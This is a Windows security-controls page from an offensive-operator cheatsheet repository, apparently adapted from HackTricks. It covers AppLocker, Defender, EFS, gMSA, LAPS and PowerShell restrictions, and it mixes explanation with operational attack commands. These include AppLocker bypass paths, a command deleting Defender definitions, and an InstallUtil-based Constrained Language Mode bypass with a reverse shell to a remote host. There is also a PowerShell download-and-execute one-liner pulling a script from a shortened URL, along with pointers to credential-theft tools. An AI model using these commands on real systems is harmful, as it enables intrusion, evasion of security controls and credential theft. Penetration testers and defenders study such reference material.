daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

authentication-credentials-uac-and-efs.md (17889B)


      1 ---
      2 title: "Windows Security Controls"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/authentication-credentials-uac-and-efs.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/authentication-credentials-uac-and-efs.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Windows Security Controls
     14 
     15 ## AppLocker Policy
     16 
     17 An application whitelist is a list of approved software applications or executables that are allowed to be present and run on a system. The goal is to protect the environment from harmful malware and unapproved software that does not align with the specific business needs of an organization.
     18 
     19 [AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) is Microsoft's **application whitelisting solution** and gives system administrators control over **which applications and files users can run**. It provides **granular control** over executables, scripts, Windows installer files, DLLs, packaged apps, and packed app installers.\
     20 It is common for organizations to **block cmd.exe and PowerShell.exe** and write access to certain directories, **but this can all be bypassed**.
     21 
     22 ### Check
     23 
     24 Check which files/extensions are blacklisted/whitelisted:
     25 
     26 ```bash
     27 Get-ApplockerPolicy -Effective -xml
     28 
     29 Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
     30 
     31 $a = Get-ApplockerPolicy -effective
     32 $a.rulecollections
     33 ```
     34 
     35 `Test-AppLockerPolicy` evaluates candidate files for a specific identity against an AppLocker policy. Test the account whose token will execute the payload because rules can target users or groups; `Get-AppLockerFileInformation` is also useful to inspect the path, hash, and publisher metadata on which rules may match.<sup>[[5]](#references)</sup>
     36 
     37 ```powershell
     38 $policy = Get-AppLockerPolicy -Effective
     39 $user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
     40 Test-AppLockerPolicy -PolicyObject $policy -Path C:\Users\Public\payload.exe -User $user
     41 Get-AppLockerFileInformation -Path C:\Users\Public\payload.exe | Format-List
     42 ```
     43 
     44 This registry path contains the configurations and policies applied by AppLocker, providing a way to review the current set of rules enforced on the system:
     45 
     46 - `HKLM\Software\Policies\Microsoft\Windows\SrpV2`
     47 
     48 ### Bypass
     49 
     50 - Useful **Writable folders** to bypass AppLocker Policy: If AppLocker is allowing to execute anything inside `C:\Windows\System32` or `C:\Windows` there are **writable folders** you can use to **bypass this**.
     51 
     52 ```text
     53 C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
     54 C:\Windows\System32\spool\drivers\color
     55 C:\Windows\Tasks
     56 C:\windows\tracing
     57 ```
     58 
     59 - Commonly **trusted** [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries can be also useful to bypass AppLocker.
     60 - **Poorly written rules could also be bypassed**
     61   - For example, **`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**, you can create a **folder called `allowed`** anywhere and it will be allowed.
     62   - Organizations also often focus on **blocking the `%System32%\WindowsPowerShell\v1.0\powershell.exe` executable**, but forget about the **other** [**PowerShell executable locations**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations) such as `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` or `PowerShell_ISE.exe`.
     63 - **DLL enforcement very rarely enabled** due to the additional load it can put on a system, and the amount of testing required to ensure nothing will break. So using **DLLs as backdoors will help bypassing AppLocker**.
     64 - You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass AppLocker. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).<sup>[[1]](#references)</sup>
     65 
     66 ## Credentials Storage
     67 
     68 ### Security Accounts Manager (SAM)
     69 
     70 Local credentials are present in this file, the passwords are hashed.
     71 
     72 ### Local Security Authority (LSA) - LSASS
     73 
     74 The **credentials** (hashed) are **saved** in the **memory** of this subsystem for Single Sign-On reasons.\
     75 **LSA** administrates the local **security policy** (password policy, users permissions...), **authentication**, **access tokens**...\
     76 LSA will be the one that will **check** for provided credentials inside the **SAM** file (for a local login) and **talk** with the **domain controller** to authenticate a domain user.
     77 
     78 The **credentials** are **saved** inside the **process LSASS**: Kerberos tickets, hashes NT and LM, easily decrypted passwords.
     79 
     80 ### LSA secrets
     81 
     82 LSA could save in disk some credentials:
     83 
     84 - Password of the computer account of the Active Directory (unreachable domain controller).
     85 - Passwords of the accounts of Windows services
     86 - Passwords for scheduled tasks
     87 - More (password of IIS applications...)
     88 
     89 ### NTDS.dit
     90 
     91 It is the database of the Active Directory. It is only present in Domain Controllers.
     92 
     93 ## Defender
     94 
     95 [**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender) is an Antivirus that is available in Windows 10 and Windows 11, and in versions of Windows Server. It **blocks** common pentesting tools such as **`WinPEAS`**. However, there are ways to **bypass these protections**.
     96 
     97 ### Check
     98 
     99 To check the **status** of **Defender** you can execute the PS cmdlet **`Get-MpComputerStatus`** (check the value of **`RealTimeProtectionEnabled`** to know if it's active):
    100 
    101 <pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus
    102 
    103 [...]
    104 AntispywareEnabled              : True
    105 AntispywareSignatureAge         : 1
    106 AntispywareSignatureLastUpdated : 12/6/2021 10:14:23 AM
    107 AntispywareSignatureVersion     : 1.323.392.0
    108 AntivirusEnabled                : True
    109 [...]
    110 NISEnabled                      : False
    111 NISEngineVersion                : 0.0.0.0
    112 [...]
    113 <strong>RealTimeProtectionEnabled       : True
    114 </strong>RealTimeScanDirection           : 0
    115 PSComputerName                  :
    116 </code></pre>
    117 
    118 To enumerate it you could also run:
    119 
    120 ```bash
    121 WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    122 wmic /namespace:\\root\securitycenter2 path antivirusproduct
    123 sc query windefend
    124 
    125 #Delete all rules of Defender (useful for machines without internet access)
    126 "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    127 ```
    128 
    129 ## Encrypted File System (EFS)
    130 
    131 EFS secures files through encryption, utilizing a **symmetric key** known as the **File Encryption Key (FEK)**. This key is encrypted with the user's **public key** and stored within the encrypted file's $EFS **alternative data stream**. When decryption is needed, the corresponding **private key** of the user's digital certificate is used to decrypt the FEK from the $EFS stream. More details can be found [here](https://en.wikipedia.org/wiki/Encrypting_File_System).
    132 
    133 **Decryption scenarios without user initiation** include:
    134 
    135 - When files or folders are moved to a non-EFS file system, like [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table), they are automatically decrypted.
    136 - Encrypted files sent over the network via SMB/CIFS protocol are decrypted prior to transmission.
    137 
    138 This encryption method allows **transparent access** to encrypted files for the owner. However, simply changing the owner's password and logging in will not permit decryption.
    139 
    140 **Key Takeaways**:
    141 
    142 - EFS uses a symmetric FEK, encrypted with the user's public key.
    143 - Decryption employs the user's private key to access the FEK.
    144 - Automatic decryption occurs under specific conditions, like copying to FAT32 or network transmission.
    145 - Encrypted files are accessible to the owner without additional steps.
    146 
    147 ### Check EFS info
    148 
    149 Check if a **user** has **used** this **service** checking if this path exists:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
    150 
    151 Check **who** has **access** to the file using cipher /c \<file>\
    152 You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files
    153 
    154 ### Decrypting EFS files
    155 
    156 #### Being Authority System
    157 
    158 This approach requires the **victim user** to be **running** a **process** on the host. If so, from a `meterpreter` session you can impersonate the user's process token (`impersonate_token` from `incognito`). Alternatively, you can `migrate` into the user's process.
    159 
    160 #### Knowing the User's Password
    161 
    162 Mimikatz can import the user's certificate and private key, then use them to decrypt EFS-protected files.<sup>[[2]](#references)</sup>
    163 
    164 [Howto ~ Decrypt Efs Files](https%3A//github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files)
    165 
    166 ## Group Managed Service Accounts (gMSA)
    167 
    168 Microsoft developed **Group Managed Service Accounts (gMSA)** to simplify the management of service accounts in IT infrastructures. Unlike traditional service accounts that often have the "**Password never expire**" setting enabled, gMSAs offer a more secure and manageable solution:
    169 
    170 - **Automatic Password Management**: gMSAs use a complex, 240-character password that automatically changes according to domain or computer policy. This process is handled by Microsoft's Key Distribution Service (KDC), eliminating the need for manual password updates.
    171 - **Enhanced Security**: These accounts are immune to lockouts and cannot be used for interactive logins, enhancing their security.
    172 - **Multiple Host Support**: gMSAs can be shared across multiple hosts, making them ideal for services running on multiple servers.
    173 - **Scheduled Task Capability**: Unlike managed service accounts, gMSAs support running scheduled tasks.
    174 - **Simplified SPN Management**: The system automatically updates the Service Principal Name (SPN) when there are changes to the computer's sAMaccount details or DNS name, simplifying SPN management.
    175 
    176 The passwords for gMSAs are stored in the LDAP property _**msDS-ManagedPassword**_ and are automatically reset every 30 days by Domain Controllers (DCs). This password, an encrypted data blob known as [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e), can only be retrieved by authorized administrators and the servers on which the gMSAs are installed, ensuring a secure environment. To access this information, a secured connection such as LDAPS is required, or the connection must be authenticated with 'Sealing & Secure'.
    177 
    178 ![https://cube0x0.github.io/Relaying-for-gMSA/](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/asd1.png)<sup>[[3]](#references)</sup>
    179 
    180 You can read this password with [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**:**
    181 
    182 ```text
    183 /GMSAPasswordReader --AccountName jkohler
    184 ```
    185 
    186 [**Find more info in this post**](https://cube0x0.github.io/Relaying-for-gMSA/)<sup>[[3]](#references)</sup>
    187 
    188 Also, check this [web page](https://cube0x0.github.io/Relaying-for-gMSA/) about how to perform a **NTLM relay attack** to **read** the **password** of **gMSA**.<sup>[[3]](#references)</sup>
    189 
    190 ## LAPS
    191 
    192 Distinguish **legacy Microsoft LAPS** from the native **Windows LAPS** implementation during enumeration. Windows LAPS shipped in the April 11, 2023 Windows updates and can back up a managed local administrator password to **Windows Server Active Directory** or **Microsoft Entra ID**. In AD-backed deployments it can additionally encrypt passwords, retain encrypted password history, and manage a domain controller's DSRM password. The downloadable legacy MSI is deprecated on newer Windows versions, although Windows LAPS can operate in legacy-emulation mode.<sup>[[6]](#references)</sup>
    193 
    194 Because legacy Microsoft LAPS and Windows LAPS are separate implementations, identify which one is deployed before applying attribute- or cmdlet-specific attacks. The linked page covers discovery, ACL enumeration, retrieval, expiration manipulation, and offline recovery without duplicating those procedures here.<sup>[[6]](#references)</sup>
    195 
    196 [Laps](/hacktricks/windows-hardening/active-directory-methodology/laps)
    197 
    198 ## PS Constrained Language Mode
    199 
    200 PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **locks down many of the features** needed to use PowerShell effectively, such as blocking COM objects, only allowing approved .NET types, XAML-based workflows, PowerShell classes, and more.
    201 
    202 ### **Check**
    203 
    204 ```bash
    205 $ExecutionContext.SessionState.LanguageMode
    206 #Values could be: FullLanguage or ConstrainedLanguage
    207 ```
    208 
    209 ### Bypass
    210 
    211 ```bash
    212 #Easy bypass
    213 Powershell -version 2
    214 ```
    215 
    216 In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM).\
    217 **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` and **change the project to .Net4.5**.
    218 
    219 #### Direct bypass:
    220 
    221 ```bash
    222 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
    223 ```
    224 
    225 #### Reverse shell:
    226 
    227 ```bash
    228 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
    229 ```
    230 
    231 You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass the constrained mode. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).<sup>[[1]](#references)</sup>
    232 
    233 ## PS Execution Policy
    234 
    235 By default it is set to **restricted.** Main ways to bypass this policy:<sup>[[4]](#references)</sup>
    236 
    237 ```bash
    238 1º Just copy and paste inside the interactive PS console
    239 2º Read en Exec
    240 Get-Content .runme.ps1 | PowerShell.exe -noprofile -
    241 3º Read and Exec
    242 Get-Content .runme.ps1 | Invoke-Expression
    243 4º Use other execution policy
    244 PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
    245 5º Change users execution policy
    246 Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
    247 6º Change execution policy for this session
    248 Set-ExecutionPolicy Bypass -Scope Process
    249 7º Download and execute:
    250 powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
    251 8º Use command switch
    252 Powershell -command "Write-Host 'My voice is my passport, verify me.'"
    253 9º Use EncodeCommand
    254 $command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
    255 ```
    256 
    257 More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)<sup>[[4]](#references)</sup>
    258 
    259 ## Security Support Provider Interface (SSPI)
    260 
    261 Is the API that can be use to authenticate users.
    262 
    263 The SSPI will be in charge of finding the adequate protocol for two machines that want to communicate. The preferred method for this is Kerberos. Then the SSPI will negotiate which authentication protocol will be used, these authentication protocols are called Security Support Provider (SSP), are located inside each Windows machine in the form of a DLL and both machines must support the same to be able to communicate.
    264 
    265 ### Main SSPs
    266 
    267 - **Kerberos**: The preferred one
    268   - %windir%\Windows\System32\kerberos.dll
    269 - **NTLMv1** and **NTLMv2**: Compatibility reasons
    270   - %windir%\Windows\System32\msv1_0.dll
    271 - **Digest**: Web servers and LDAP, password in form of a MD5 hash
    272   - %windir%\Windows\System32\Wdigest.dll
    273 - **Schannel**: SSL and TLS
    274   - %windir%\Windows\System32\Schannel.dll
    275 - **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one)
    276   - %windir%\Windows\System32\lsasrv.dll
    277 
    278 #### The negotiation could offer several methods or only one.
    279 
    280 ## UAC - User Account Control
    281 
    282 [User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) is a feature that enables a **consent prompt for elevated activities**.
    283 
    284 [Uac User Account Control](/hacktricks/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control)
    285 
    286 
    287 ## References
    288 
    289 - [1] [Bypassing AppLocker and PowerShell constrained language mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)
    290 - [2] [howto ~ decrypt EFS files](https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files)
    291 - [3] [Relaying for gMSA](https://cube0x0.github.io/Relaying-for-gMSA/)
    292 - [4] [15 Ways to Bypass the PowerShell Execution Policy](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
    293 - [5] [Use the AppLocker Windows PowerShell cmdlets](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/applocker/use-the-applocker-windows-powershell-cmdlets)
    294 - [6] [Windows LAPS overview](https://learn.microsoft.com/en-us/windows-server/identity/laps/laps-overview)